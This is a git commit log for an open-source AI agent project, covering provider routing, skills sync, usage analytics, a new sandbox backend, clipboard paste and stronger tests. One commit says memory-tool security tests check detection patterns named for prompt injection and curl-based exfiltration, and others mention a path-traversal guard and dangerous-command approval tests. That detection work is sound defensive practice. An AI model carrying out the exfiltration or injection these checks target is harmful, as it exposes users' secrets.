Tests: 50 new tests covering registry, aliases, resolution, auto-detection,
credential resolution, and runtime provider dispatch.

Inspired by PR #33 (numman-ali) which proposed a provider registry approach.
Credit to tars90percent (PR #473) and manuelschipper (PR #420) for related
provider improvements merged earlier in this changeset.
2026-03-06 18:55:18 -08:00
Teknium
fdebca4573 Merge pull request #571 from NousResearch/rewbs/nous-key-remint-attempt-on-401
fix: implement Nous credential refresh on 401 error for retry logic
2026-03-06 18:52:01 -08:00
teknium1
479dfc096a Merge PR #473: Update model id in OpenRouter from minimax-m2.1 to minimax-m2.5
Authored by tars90percent. Updates remaining minimax-m2.1 references to
minimax-m2.5 in rl_training_tool.py and docs.
2026-03-06 18:43:18 -08:00
teknium1
3c6c11b7c9 Merge PR #420: fix: respect OPENAI_BASE_URL when resolving API key priority
Authored by manuelschipper. Adds GLM-4.7 and GLM-5 context lengths (202752)
to model_metadata.py. The key priority fix (prefer OPENAI_API_KEY for
non-OpenRouter endpoints) was already applied in PR #295; merged the Z.ai
mention into the comment.
2026-03-06 18:43:13 -08:00
Robin Fernandes
bc091eb7ef fix: implement Nous credential refresh on 401 error for retry logic 2026-03-07 13:34:23 +11:00
alireza78a
a857321463 fix(code-execution): close server socket in finally block to prevent fd leak 2026-03-07 05:49:48 +03:30
teknium1
f75b1d21b4 fix: execute_code and delegate_task now respect disabled toolsets
When a user disables the web toolset via 'hermes tools', the execute_code
schema description still hardcoded web_search/web_extract as available,
causing the model to keep trying to use them. Similarly, delegate_task
always defaulted to ['terminal', 'file', 'web'] for subagents regardless
of the parent's config.

Changes:
- execute_code schema is now built dynamically via build_execute_code_schema()
  based on which sandbox tools are actually enabled
- model_tools.py rebuilds the execute_code schema at definition time using
  the intersection of sandbox-allowed and session-enabled tools
- delegate_task now inherits the parent agent's enabled_toolsets instead of
  hardcoding DEFAULT_TOOLSETS when no explicit toolsets are specified
- delegate_task description updated to say 'inherits your enabled toolsets'

Reported by kotyKD on Discord.
2026-03-06 17:36:14 -08:00
0xbyt4
33cfe1515d fix: sanitize FTS5 queries and close mirror DB connections
Two bugs fixed:

1. search_messages() crashes with OperationalError when user queries
   contain FTS5 special characters (+, ", (, {, dangling AND/OR, etc).
   Added _sanitize_fts5_query() to strip dangerous operators and a
   fallback try-except for edge cases.

2. _append_to_sqlite() in mirror.py creates a new SessionDB per call
   but never closes it, leaking SQLite connections. Added finally block
   to ensure db.close() is always called.
2026-03-07 04:24:45 +03:00
teknium1
94053d75a6 fix: custom endpoint no longer leaks OPENROUTER_API_KEY (#560)
API key selection is now base_url-aware: when the resolved base_url
targets OpenRouter, OPENROUTER_API_KEY takes priority (preserving the
#289 fix). When hitting any other endpoint (Z.ai, vLLM, custom, etc.),
OPENAI_API_KEY takes priority so the OpenRouter key doesn't leak.

Applied in both the runtime provider resolver (the real code path) and
the CLI initial default (for consistency).

Fixes #560.
2026-03-06 17:16:14 -08:00
teknium1
2a68099675 fix(tests): isolate tests from user ~/.hermes/ config and SOUL.md
_make_cli() now patches CLI_CONFIG with clean defaults so
test_cli_init tests don't depend on the developer's local config.yaml.
test_empty_dir_returns_empty now mocks Path.home() so it doesn't pick
up a global SOUL.md.

Credit to teyrebaz33 for identifying and fixing these in PR #557.
Fixes #555.
2026-03-06 17:10:35 -08:00
0xbyt4
3b43f7267a fix: count actual tool calls instead of tool-related messages
tool_call_count was inaccurate in two ways:

1. Under-counting: an assistant message with N parallel tool calls
   (e.g. "kill the light and shut off the fan" = 2 ha_call_service)
   only incremented tool_call_count by 1 instead of N.

2. Over-counting: tool response messages (role=tool) also incremented
   tool_call_count, double-counting every tool interaction.

Combined: 2 parallel tool calls produced tool_call_count=3 (1 from
assistant + 2 from tool responses) instead of the correct value of 2.

Fix: only count from assistant messages with tool_calls, incrementing
by len(tool_calls) to handle parallel calls correctly. Tool response
messages no longer affect tool_call_count.

This impacts /insights and /usage accuracy for sessions with tool use.
2026-03-07 04:07:52 +03:00
teknium1
6cd3bc6640 Merge PR #563: fix: prevent data loss in skills sync on copy/update failure
Authored by 0xbyt4. Two bugs fixed:
1. Failed copytree no longer poisons the manifest (skill gets retried)
2. Failed update no longer destroys user's copy (backup + restore)
2026-03-06 17:01:30 -08:00
0xbyt4
211b55815e fix: prevent data loss in skills sync on copy/update failure
Two bugs in sync_skills():

1. Failed copytree poisons manifest: when shutil.copytree fails (disk
   full, permission error), the skill is still recorded in the manifest.
   On the next sync, the skill appears as "in manifest but not on disk"
   which is interpreted as "user deliberately deleted it" — the skill
   is never retried.  Fix: only write to manifest on successful copy.

2. Failed update destroys user copy: rmtree deletes the existing skill
   directory before copytree runs. If copytree then fails, the user's
   skill is gone with no way to recover.  Fix: move to .bak before
   copying, restore from backup if copytree fails.

Both bugs are proven by new regression tests that fail on the old code
and pass on the fix.
2026-03-07 03:58:32 +03:00
teknium1
8ae4a6f824 fix: improve handling of empty responses after tool calls
- Added fallback mechanism to utilize previous content when the model generates an empty response after tool calls, reducing unnecessary API retries.
- Enhanced logging to indicate when prior content is used as a final response.
- Updated logic to ensure that genuine empty responses are retried appropriately, maintaining user experience.
2026-03-06 16:54:31 -08:00
teknium1
b98301677a docs: add /insights to all help menus and documentation
- website/docs/reference/cli-commands.md: Added 'hermes insights' terminal
  command section with --days and --source flags, plus /insights slash command
  in the Conversation section
- website/docs/user-guide/cli.md: Added /insights to slash commands table
- website/docs/user-guide/messaging/index.md: Added /insights to gateway
  chat commands table
- website/docs/user-guide/sessions.md: Added cross-reference to hermes
  insights from the sessions stats section
2026-03-06 16:48:58 -08:00
teknium1
f2fdde5ba4 fix: show user-modified skills count in hermes update output 2026-03-06 16:14:43 -08:00
teknium1
4f56e31dc7 fix: track origin hashes in skills manifest to preserve user modifications
Upgrade skills_sync manifest to v2 format (name:origin_hash). The origin
hash records the MD5 of the bundled skill at the time it was last synced.

On update, the user's copy is compared against the origin hash:
- User copy == origin hash → unmodified → safe to update from bundled
- User copy != origin hash → user customized → skip (preserve changes)

v1 manifests (plain names) are auto-migrated: the user's current hash
becomes the baseline, so future syncs can detect modifications.

Output now shows user-modified skills:
  ~ whisper (user-modified, skipping)

27 tests covering all scenarios including v1→v2 migration, user
modification detection, update after migration, and origin hash tracking.
2009 tests pass.
2026-03-06 16:13:58 -08:00
Teknium
6d3804770c Merge pull request #552 from NousResearch/feat/insights
feat: /insights command — usage analytics, cost estimation & activity patterns
2026-03-06 16:00:28 -08:00
teknium1
ab0f4126cf fix: restore all removed bundled skills + fix skills sync system
- Restored 21 skills removed in commits 757d012 and 740dd92:
  accelerate, audiocraft, code-review, faiss, flash-attention, gguf,
  grpo-rl-training, guidance, llava, nemo-curator, obliteratus, peft,
  pytorch-fsdp, pytorch-lightning, simpo, slime, stable-diffusion,
  tensorrt-llm, torchtitan, trl-fine-tuning, whisper

- Rewrote sync_skills() with proper update semantics:
  * New skills (not in manifest): copied to user dir
  * Existing skills (in manifest + on disk): updated via hash comparison
  * User-deleted skills (in manifest, not on disk): respected, not re-added
  * Stale manifest entries (removed from bundled): cleaned from manifest

- Added sync_skills() to CLI startup (cmd_chat) and gateway startup
  (start_gateway) — previously only ran during 'hermes update'

- Updated cmd_update output to show new/updated/cleaned counts

- Rewrote tests: 20 tests covering manifest CRUD, dir hashing, fresh
  install, user deletion respect, update detection, stale cleanup, and
  name collision handling

75 bundled skills total. 2002 tests pass.
2026-03-06 15:57:30 -08:00
unmodeled-tyler
1755a9e38a Design agent migration skill for Hermes Agent from OpenClaw | Run
successful dry tests with reports
2026-03-06 15:12:45 -08:00
teknium1
585f8528b2 fix: deep review — prefix matching, tool_calls extraction, query perf, serialization
Issues found and fixed during deep code path review:

1. CRITICAL: Prefix matching returned wrong prices for dated model names
   - 'gpt-4o-mini-2024-07-18' matched gpt-4o ($2.50) instead of gpt-4o-mini ($0.15)
   - Same for o3-mini→o3 (9x), gpt-4.1-mini→gpt-4.1 (5x), gpt-4.1-nano→gpt-4.1 (20x)
   - Fix: use longest-match-wins strategy instead of first-match
   - Removed dangerous key.startswith(bare) reverse matching

2. CRITICAL: Top Tools section was empty for CLI sessions
   - run_agent.py doesn't set tool_name on tool response messages (pre-existing)
   - Insights now also extracts tool names from tool_calls JSON on assistant
     messages, which IS populated for all sessions
   - Uses max() merge strategy to avoid double-counting between sources

3. SELECT * replaced with explicit column list
   - Skips system_prompt and model_config blobs (can be thousands of chars)
   - Reduces memory and I/O for large session counts

4. Sets in overview dict converted to sorted lists
   - models_with_pricing / models_without_pricing were Python sets
   - Sets aren't JSON-serializable — would crash json.dumps()

5. Negative duration guard
   - end > start check prevents negative durations from clock drift

6. Model breakdown sort fallback
   - When all tokens are 0, now sorts by session count instead of arbitrary order

7. Removed unused timedelta import

Added 6 new tests: dated model pricing (4), tool_calls JSON extraction,
JSON serialization safety. Total: 69 tests.
2026-03-06 14:50:57 -08:00
teknium1
75f523f5c0 fix: unknown/custom models get zero cost instead of fake estimates
Custom OAI endpoints, self-hosted models, and local inference should NOT
show fabricated cost estimates. Changed default pricing from $3/$12 per
million tokens to $0/$0 for unrecognized models.

- Added _has_known_pricing() to distinguish commercial vs custom models
- Models with known pricing show $ amounts; unknown models show 'N/A'
- Overview shows asterisk + note when some models lack pricing data
- Gateway format adds '(excludes custom/self-hosted models)' note
- Added 7 new tests for custom model cost handling
2026-03-06 14:18:19 -08:00
teknium1
68fbae5692 docs: add Custom & Self-Hosted LLM Providers guide
Comprehensive guide for using Hermes Agent with alternative LLM backends:
- Ollama (local models, zero config)
- vLLM (high-performance GPU inference)
- SGLang (RadixAttention, prefix caching)
- llama.cpp / llama-server (CPU & Metal inference)
- LiteLLM Proxy (multi-provider gateway)
- ClawRouter (cost-optimized routing with complexity scoring)
- 10+ other compatible providers table (Together, Groq, DeepSeek, etc.)
- Choosing the Right Setup decision table
- General custom endpoint setup instructions

All of these work via the existing OPENAI_BASE_URL + OPENAI_API_KEY
custom endpoint support — no code changes needed.
2026-03-06 14:16:06 -08:00
teknium1
80f1dd8d37 docs: add Custom & Self-Hosted LLM Providers guide
Comprehensive guide for using Hermes Agent with alternative LLM backends:
- Ollama (local models, zero config)
- vLLM (high-performance GPU inference)
- SGLang (RadixAttention, prefix caching)
- llama.cpp / llama-server (CPU & Metal inference)
- LiteLLM Proxy (multi-provider gateway)
- ClawRouter (cost-optimized routing with complexity scoring)
- 10+ other compatible providers table (Together, Groq, DeepSeek, etc.)
- Choosing the Right Setup decision table
- General custom endpoint setup instructions

All of these work via the existing OPENAI_BASE_URL + OPENAI_API_KEY
custom endpoint support — no code changes needed.
2026-03-06 14:15:57 -08:00
teknium1
b52b37ae64 feat: add /insights command with usage analytics and cost estimation
Inspired by Claude Code's /insights, adapted for Hermes Agent's multi-platform
architecture. Analyzes session history from state.db to produce comprehensive
usage insights.

Features:
- Overview stats: sessions, messages, tokens, estimated cost, active time
- Model breakdown: per-model sessions, tokens, and cost estimation
- Platform breakdown: CLI vs Telegram vs Discord etc. (unique to Hermes)
- Tool usage ranking: most-used tools with percentages
- Activity patterns: day-of-week chart, peak hours, streaks
- Notable sessions: longest, most messages, most tokens, most tool calls
- Cost estimation: real pricing data for 25+ models (OpenAI, Anthropic,
  DeepSeek, Google, Meta) with fuzzy model name matching
- Configurable time window: --days flag (default 30)
- Source filtering: --source flag to filter by platform

Three entry points:
- /insights slash command in CLI (supports --days and --source flags)
- /insights slash command in gateway (compact markdown format)
- hermes insights CLI subcommand (standalone)

Includes 56 tests covering pricing helpers, format helpers, empty DB,
populated DB with multi-platform data, filtering, formatting, and edge cases.
2026-03-06 14:04:59 -08:00
aydnOktay
566aeaeefa Make skill file writes atomic 2026-03-07 00:49:10 +03:00
Himess
7a0544ab57 fix: three small inconsistencies across cron, gateway, and daytona
1. cron/jobs.py: respect HERMES_HOME env var for job storage path.
   scheduler.py already uses os.getenv("HERMES_HOME", ...) but jobs.py
   hardcodes Path.home() / ".hermes", causing path mismatch when
   HERMES_HOME is set.

2. gateway/run.py: add Platform.HOMEASSISTANT to default_toolset_map
   and platform_config_key. The adapter and hermes-homeassistant
   toolset both exist but the mapping dicts omit it, so HomeAssistant
   events silently fall back to the Telegram toolset.

3. tools/environments/daytona.py: use time.monotonic() for deadline
   instead of float subtraction. All other backends (docker, ssh,
   singularity, local) use monotonic clock for timeout tracking.
   The accumulator pattern (deadline -= 0.2) drifts because
   t.join(0.2) + interrupt checks take longer than 0.2s per iteration.
2026-03-06 16:52:17 +03:00
teknium1
d63b363cde refactor: extract atomic_json_write helper, add 24 checkpoint tests
Extract the duplicated temp-file + fsync + os.replace pattern from
batch_runner.py (1 instance) and process_registry.py (2 instances) into
a shared utils.atomic_json_write() function.

Add 12 tests for atomic_json_write covering: valid JSON, parent dir
creation, overwrite, crash safety (original preserved on error), no temp
file leaks, string paths, unicode, custom indent, concurrent writes.

Add 12 tests for batch_runner checkpoint behavior covering:
_save_checkpoint (valid JSON, last_updated, overwrite, lock/no-lock,
parent dirs, no temp leaks), _load_checkpoint (missing file, existing
data, corrupt JSON), and resume logic (preserves prior progress,
different run_name starts fresh).
2026-03-06 05:50:12 -08:00
teknium1
c05c60665e Merge PR #298: Make process_registry checkpoint writes atomic
Authored by aydnOktay. Companion to PR #297 (batch_runner). Applies the
same atomic write pattern (temp file + fsync + os.replace) to both
_write_checkpoint() and recover_from_checkpoint() in process_registry.py.
Prevents checkpoint corruption on gateway crashes. Also improves error
handling: bare 'pass' replaced with logger.debug(..., exc_info=True)
for better debugging.
2026-03-06 05:32:35 -08:00
teknium1
b4873a5de7 fix(setup): Escape skips instead of exiting, add control hints to all prompts
Previously pressing Escape in any setup wizard menu called sys.exit(1),
killing the entire wizard with no way to recover. Now:

- prompt_choice: Escape keeps the current default and moves on (prints
  'Skipped (keeping current)'). Shows '↑/↓ Navigate  Enter Select
  Esc Skip  Ctrl+C Exit' hint.
- prompt_checklist: Escape returns pre-selected items instead of empty
  list. Shows 'SPACE Toggle  ENTER Confirm  ESC Skip  Ctrl+C Exit'.
- prompt_yes_no: now catches KeyboardInterrupt/EOFError properly.
- Fallback number prompts also show control hints.

Ctrl+C still exits the wizard cleanly.
2026-03-06 05:27:11 -08:00
teknium1
913f8ce0a5 Merge PR #297: Make batch_runner checkpoint incremental and atomic
Authored by aydnOktay. Three improvements to batch_runner fault tolerance:
1) Atomic checkpoint writes (temp file + fsync + os.replace) to prevent
   corruption on crashes — same pattern as auth.py's _save_auth_store().
2) Incremental checkpoints after each batch result instead of only at end,
   so interrupted runs can resume with minimal progress loss.
3) Resume loads existing checkpoint state instead of initializing empty,
   preventing clobber of prior progress.

Conflict resolved: kept both the incremental checkpoint logic (PR) and
the batch worker error handling (HEAD) in the imap_unordered loop.
2026-03-06 05:16:31 -08:00
Himess
453e0677d6 fix: use regex for search output parsing to handle Windows drive-letter paths
The ripgrep/grep output parser uses `split(':', 2)` to extract
file:lineno:content from match lines. On Windows, absolute paths
contain a drive letter colon (e.g. `C:\Users\foo\bar.py:42:content`),
so `split(':', 2)` produces `["C", "\Users\...", "42:content"]`.
`int(parts[1])` then raises ValueError and the match is silently
dropped. All search results are lost on Windows.

Same category as #390 — string-based path parsing that fails on
Windows. Replace `split()` with a regex that optionally captures
the drive letter prefix: `^([A-Za-z]:)?(.*?):(\d+):(.*)$`.

Applied to both `_search_with_rg` and `_search_with_grep`.
2026-03-06 15:54:33 +03:00
teknium1
4a63737227 Merge PR #433: fix(whatsapp): replace Linux-only fuser with cross-platform port cleanup
Authored by Farukest. Fixes #432. Extracts _kill_port_process() helper
that uses netstat+taskkill on Windows and fuser on Linux. Previously,
fuser calls were inline with bare except-pass, so on Windows orphaned
bridge processes were never cleaned up — causing 'address already in use'
errors on reconnect. Includes 5 tests covering both platforms, port
matching edge cases, and exception suppression.
2026-03-06 04:52:25 -08:00
teknium1
3e93db16bd Merge PR #436: fix: use _max_tokens_param in max-iterations retry path
Authored by Farukest. Fixes #435. The retry summary in
_handle_max_iterations() hardcoded max_tokens instead of using
_max_tokens_param(), which returns max_completion_tokens for direct
OpenAI API (required by gpt-4o, o-series). The first attempt already
used _max_tokens_param correctly — only the retry path was wrong.
Includes 4 tests for _max_tokens_param provider detection.
2026-03-06 04:46:24 -08:00
teknium1
f863a42351 Merge PR #441: fix(gateway): return response from /retry handler instead of discarding it
Authored by PercyDikec. Fixes #440. _handle_retry_command called
_handle_message(retry_event) but discarded the return value, returning
None instead. Since only _process_message_background sends the response
via adapter.send(), this meant the agent would run (tool progress was
visible) but the final answer was silently dropped on all platforms.
2026-03-06 04:42:54 -08:00
teknium1
dc55f493be fix: add missing re.DOTALL to DeepSeek V3.1 parser (same bug as V3)
The V3.1 parser had the same issue — .*? without re.DOTALL fails to
match multi-line JSON arguments. Found during review of PR #444.
2026-03-06 04:41:47 -08:00
teknium1
936fda3f9e Merge PR #444: fix: add missing re.DOTALL flag to DeepSeek V3 tool call parser
Authored by PercyDikec. Fixes #443. Without re.DOTALL, the regex .*
doesn't match newlines, so multi-line JSON arguments (the normal case)
silently fail to parse. Every other parser in the codebase that matches
across lines already uses re.DOTALL.
2026-03-06 04:39:53 -08:00
teknium1
ecb8148a9f Merge PR #448: fix(cli): use correct dict key for codex auth file path in status output
Authored by PercyDikec. Fixes #447. The status display used
codex_status.get('auth_file') but get_codex_auth_status() in auth.py
returns the path under 'auth_store' (line 1220). This one-char key
mismatch silently dropped the auth file path from 'hermes status'.
2026-03-06 04:34:46 -08:00
teknium1
2dbbedc05a docs: rebrand messaging — 'the self-improving AI agent'
- Lead with the learning loop: autonomous skill creation, skill
  self-improvement, memory nudges, FTS5 session search, Honcho
  dialectic user modeling
- 'Runs anywhere' angle: 6 backends, serverless persistence with
  Daytona/Modal, not tied to your laptop
- 'Built by model trainers' replaces 'model-agnostic'
- Updated README tagline, feature table, subtitle
- Updated docs landing page hero, description, key features
- Updated docusaurus tagline and pyproject.toml description
2026-03-06 04:34:06 -08:00
teknium1
c30967806c test: add 26 tests for set_config_value secret routing
Verifies explicit allowlist keys, catch-all _API_KEY/_TOKEN patterns,
case insensitivity, TERMINAL_SSH prefix, and config.yaml routing for
non-secret keys. Covers the fix from PR #469.
2026-03-06 04:26:18 -08:00
teknium1
145f719d30 Merge PR #469: fix(config): route API keys and tokens to .env instead of config.yaml
Authored by ygd58. Fixes #465. Adds missing keys to allowlist and
catch-all patterns (_API_KEY, _TOKEN suffixes) for future-proofing.
2026-03-06 04:23:49 -08:00
Himess
32dbd31b9a fix: restrict .env file permissions to owner-only
save_env_value() writes API keys to ~/.hermes/.env but never sets file
permissions, leaving the file world-readable (0644). auth.py already
restricts auth.json to 0600 — apply the same treatment to .env.

Skipped on Windows where chmod is not effective.
2026-03-06 15:14:26 +03:00
teknium1
b89eb29174 fix: correct mock tool name 'search' → 'search_files' in test_code_execution
The mock handler checked for function_name == 'search' but the RPC
sends 'search_files'. Any test exercising search_files through the
mock would get 'Unknown tool' instead of the canned response.
2026-03-06 03:53:43 -08:00
teknium1
3670089a42 docs: add Daytona to batch_runner, process_registry, agent_loop, tool_context
Add daytona_image to batch_runner per-prompt container image overrides
so batch processing works with the Daytona backend. Update inline
comments in RL environment files (agent_loop, tool_context) and
process_registry docstrings to include Daytona in backend lists.
2026-03-06 03:49:59 -08:00
teknium1
3982fcf095 fix: sync execute_code sandbox stubs with real tool schemas
The _TOOL_STUBS dict in code_execution_tool.py was out of sync with the
actual tool schemas, causing TypeErrors when the LLM used parameters it
sees in its system prompt but the sandbox stubs didn't accept:

search_files:
  - Added missing params: context, offset, output_mode
  - Fixed target default: 'grep' → 'content' (old value was obsolete)

patch:
  - Added missing params: mode, patch (V4A multi-file patch support)

Also added 4 drift-detection tests (TestStubSchemaDrift) that will
catch future divergence between stubs and real schemas:
  - test_stubs_cover_all_schema_params: every schema param in stub
  - test_stubs_pass_all_params_to_rpc: every stub param sent over RPC
  - test_search_files_target_uses_current_values: no obsolete values
  - test_generated_module_accepts_all_params: generated code compiles

All 28 tests pass.
2026-03-06 03:40:06 -08:00
teknium1
8481fdcf08 docs: complete Daytona backend documentation coverage
Update all remaining files that enumerate terminal backends to include
Daytona. Covers security docs (bypass info, backend comparison table),
environment variables reference (DAYTONA_API_KEY, TERMINAL_DAYTONA_IMAGE,
container resources header), AGENTS.md (architecture tree, config keys),
environments/README.md, hermes_base_env.py field description, and various
module docstrings.

Follow-up to PR #451 merge.
2026-03-06 03:37:05 -08:00
teknium1
39299e2de4 Merge PR #451: feat: Add Daytona environment backend
Authored by rovle. Adds Daytona as the sixth terminal execution backend
with cloud sandboxes, persistent workspaces, and full CLI/gateway integration.
Includes 24 unit tests and 8 integration tests.
2026-03-06 03:32:40 -08:00
teknium1
efec4fcaab feat(execute_code): add json_parse, shell_quote, retry helpers to sandbox
The execute_code sandbox generates a hermes_tools.py stub module for LLM
scripts. Three common failure modes keep tripping up scripts:

1. json.loads(strict=True) rejects control chars in terminal() output
   (e.g., GitHub issue bodies with literal tabs/newlines)
2. Shell backtick/quote interpretation when interpolating dynamic content
   into terminal() commands (markdown with backticks gets eaten by bash)
3. No retry logic for transient network failures (API timeouts, rate limits)

Adds three convenience helpers to the generated hermes_tools module:

- json_parse(text) — json.loads with strict=False for tolerant parsing
- shell_quote(s) — shlex.quote() for safe shell interpolation
- retry(fn, max_attempts=3, delay=2) — exponential backoff wrapper

Also updates the EXECUTE_CODE_SCHEMA description to document these helpers
so LLMs know they're available without importing anything extra.

Includes 7 new tests (unit + integration) covering all three helpers.
2026-03-06 01:52:46 -08:00
teknium1
5ce2c47d60 docs: update all docs for optional-skills and browse command
Update 7 documentation files to reflect:
- optional-skills/ directory in all project structure trees
- 'hermes skills browse' in all CLI command listings
- '/skills browse' in all slash command references
- Three-tier skill placement (bundled → optional → hub)
- 'official' trust level in trust level tables
- Updated /skills description from 'Search, install...' to 'Browse, search...'

Files updated:
- CONTRIBUTING.md (skill classification, project tree, section title)
- AGENTS.md (project tree, Skills Hub description, source adapters list)
- website/docs/reference/cli-commands.md (CLI table, slash command table)
- website/docs/developer-guide/creating-skills.md (structure, classification, trust)
- website/docs/user-guide/features/skills.md (hub commands, trust table, slash commands)
- website/docs/user-guide/cli.md (slash command description)
- website/docs/developer-guide/architecture.md (project tree)
2026-03-06 01:46:34 -08:00
teknium1
f6f3d1de9b fix: review fixes — path traversal guard, trust_style consistency, edge cases
Address code review findings:

Security (Medium):
- Path traversal guard in OptionalSkillSource.fetch() — resolve() and
  validate that the path stays within optional-skills/ before reading

Bug fixes (Medium):
- Add 'builtin' to trust_style dicts in do_inspect() and
  _resolve_short_name() — official skills now show bright_cyan 'official'
  label consistently across all display functions (5/5 dicts fixed)

Edge cases (Low):
- Clamp page_size to [1, 100] in do_browse() to prevent ZeroDivisionError
- Update SkillMeta.source docstring to include 'official'
- Add browse command to optional-skills/DESCRIPTION.md
2026-03-06 01:40:01 -08:00
teknium1
ec0fe3242a feat: 'hermes skills browse' — paginated browsing of all hub skills
Add a browse command that shows all available skills across all registries,
paginated and sorted with official skills first.

Usage:
  hermes skills browse                    # all sources, page 1
  hermes skills browse --source official  # only official optional skills
  hermes skills browse --page 2           # page 2
  hermes skills browse --size 30          # 30 per page
  /skills browse                          # slash command in chat

Features:
- Official optional skills always appear first (★ marker, cyan styling)
- Per-source limits prevent overloading (100 official/github, 50 others)
- Deduplication by name preferring higher trust
- Sorted: official > trusted > community, then alphabetical
- Page navigation hints at bottom
- Source counts summary
- Works in both CLI and /skills chat interface
- Added 'official' as source filter option for search command too
2026-03-06 01:29:45 -08:00
teknium1
f2e24faaca feat: optional skills — official skills shipped but not activated by default
Add 'optional-skills/' directory for official skills that ship with the repo
but are not copied to ~/.hermes/skills/ during setup. They are:
- NOT shown to the model in the system prompt
- NOT copied during hermes setup/update
- Discoverable via 'hermes skills search' labeled as 'official'
- Installable via 'hermes skills install' with builtin trust (no third-party warning)
- Auto-categorized on install based on directory structure

Implementation:
- OptionalSkillSource adapter in tools/skills_hub.py (search/fetch/inspect)
- Added to create_source_router() as first source (highest priority)
- Trust level 'builtin' for official skills in skills_guard.py
- Friendly install message for official skills (no third-party warning)
- 'official' label in cyan in search results and skill list

First optional skill: Blackbox CLI (autonomous-ai-agents/blackbox)
- Multi-model coding agent with built-in judge/Chairman pattern
- Delegates to Claude, Codex, Gemini, and Blackbox models
- Open-source CLI (GPL-3.0, TypeScript, forked from Gemini CLI)
- Requires paid Blackbox AI API key

Refs: #475
2026-03-06 01:24:11 -08:00
teknium1
8c80b96318 chore: update OpenRouter model list
- Remove opus-4.5 and gpt-5.2
- Reorder GPT: 5.4-pro, 5.4, 5.3-codex
- Add qwen/qwen3.5-plus-02-15 and qwen/qwen3.5-35b-a3b
- Update z-ai/glm-4.7 → glm-5
- Update minimax/minimax-m2.1 → minimax-m2.5
2026-03-06 00:52:45 -08:00
teknium1
2387465dcc chore: add openai/gpt-5.4-pro and stepfun/step-3.5-flash to OpenRouter models 2026-03-06 00:49:25 -08:00
tars90percent
32636ecf8a Update MiniMax model ID from m2.1 to m2.5 2026-03-06 16:47:48 +08:00
ygd58
6055adbe1b fix(config): route API keys and tokens to .env instead of config.yaml 2026-03-06 08:55:36 +01:00
teknium1
ffd2f8dc50 docs: add Vision & Image Paste guide with platform compatibility
New docs page covering clipboard image paste across all platforms:
- Platform compatibility table (macOS, Linux X11/Wayland, WSL2, VSCode, SSH)
- Setup instructions per platform (xclip, wl-paste, powershell.exe)
- Explanation of terminal paste limitations and why /paste exists
- SSH workarounds (file upload, URLs, X11 forwarding, messaging)
- Keybinding reference (Alt+V, Ctrl+V, /paste) with when each works

Also updates CLI commands reference with /paste command and
Alt+V keybinding documentation.
2026-03-05 23:51:46 -08:00
teknium1
e93b4d1dcd feat: Alt+V keybinding for clipboard image paste
Alt key combos pass through all terminal emulators (sent as ESC + key),
unlike Ctrl+V which terminals intercept for text paste. This is the
reliable way to attach clipboard images on WSL2, Windows Terminal,
VSCode, and SSH sessions where Ctrl+V never reaches the application
for image-only clipboard content.

Also adds 'Paste image: Alt+V (or /paste)' hint to /help output.
2026-03-05 22:48:39 -08:00
teknium1
014a5b712d fix: prevent duplicate gateway instances from running simultaneously
start_gateway() now checks for an existing running instance via PID file
before starting. If another gateway is already running under the same
HERMES_HOME, it refuses to start with a clear error message directing the
user to 'hermes gateway restart' or 'hermes gateway stop'.

Also fixes gateway/status.py to respect the HERMES_HOME env var instead of
hardcoding ~/.hermes. This scopes the PID file per HERMES_HOME directory,
which lays the groundwork for future multi-profile support where distinct
HERMES_HOME directories can run concurrent gateway instances independently.
2026-03-05 20:35:33 -08:00
teknium1
2317d115cd fix: clipboard image paste on WSL2, Wayland, and VSCode terminal
The original implementation only supported xclip (X11), which silently
fails on WSL2 (can't access Windows clipboard for images), Wayland
desktops (xclip is X11-only), and VSCode terminal on WSL2.

Clipboard backend changes (hermes_cli/clipboard.py):
- WSL2: detect via /proc/version, use powershell.exe with .NET
  System.Windows.Forms.Clipboard to extract images as base64 PNG
- Wayland: use wl-paste with MIME type detection, auto-convert BMP
  to PNG for WSLg environments (via Pillow or ImageMagick)
- Dispatch order: WSL → Wayland → X11 (xclip), with fallthrough
- New has_clipboard_image() for lightweight clipboard checks
- Cache WSL detection result per-process

CLI changes (cli.py):
- /paste command: explicit clipboard image check for terminals where
  BracketedPaste doesn't fire (image-only clipboard in VSCode/WinTerm)
- Ctrl+V keybinding: fallback for Linux terminals where Ctrl+V sends
  raw byte instead of triggering bracketed paste

Tests: 80 tests (up from 37) covering WSL, Wayland, X11 dispatch,
BMP conversion, has_clipboard_image, and /paste command.
2026-03-05 20:22:44 -08:00
teknium1
8253b54be9 test: strengthen assertions in skill_manager + memory_tool (batch 3)
test_skill_manager_tool.py (20 weak → 0):
  - Validation error messages verified against exact strings
  - Name validation: checks specific invalid name echoed in error
  - Frontmatter validation: exact error text for missing fields,
    unclosed markers, empty content, invalid YAML
  - File path validation: traversal, disallowed dirs, root-level

test_memory_tool.py (13 weak → 0):
  - Security scan tests verify both 'Blocked' prefix AND specific
    threat pattern ID (prompt_injection, exfil_curl, etc.)
  - Invisible unicode tests verify exact codepoint strings
  - Snapshot test verifies type, header, content, and isolation
2026-03-05 18:51:43 -08:00
teknium1
5c867fd79f test: strengthen assertions across 3 more test files (batch 2)
test_run_agent.py (2 weak → 0, +13 assertions):
  - Session ID validated against actual YYYYMMDD_HHMMSS_hex format
  - API failure verifies error message propagation
  - Invalid JSON args verifies empty dict fallback + message structure
  - Context compression verifies final_response + completed flag
  - Invalid tool name retry verifies api_calls count
  - Invalid response verifies completed/failed/error structure

test_model_tools.py (3 weak → 0):
  - Unknown tool error includes tool name in message
  - Exception returns dict with 'error' key + non-empty message
  - get_all_tool_names verifies both web_search AND terminal present

test_approval.py (1 weak → 0, assert ratio 1.1 → 2.2):
  - Dangerous commands verify description content (delete, shell, drop, etc.)
  - Safe commands explicitly assert key AND desc are None
  - Pre/post condition checks for state management
2026-03-05 18:46:30 -08:00
teknium1
a44e041acf test: strengthen assertions across 7 test files (batch 1)
Replaced weak 'is not None' / '> 0' / 'len >= 1' assertions with
concrete value checks across the most flagged test files:

gateway/test_pairing.py (11 weak → 0):
  - Code assertions verify isinstance + len == CODE_LENGTH
  - Approval results verify dict structure + specific user_id/user_name
  - Added code2 != code1 check in rate_limit_expires

test_hermes_state.py (6 weak → 0):
  - ended_at verified as float timestamp
  - Search result counts exact (== 2, not >= 1)
  - Context verified as non-empty list
  - Export verified as dict, session ID verified

test_cli_init.py (4 weak → 0):
  - max_turns asserts exact value (60)
  - model asserts string with provider/name format

gateway/test_hooks.py (2 zero-assert tests → fixed):
  - test_no_handlers_for_event: verifies no handler registered
  - test_handler_error_does_not_propagate: verifies handler count + return

gateway/test_platform_base.py (9 weak image tests → fixed):
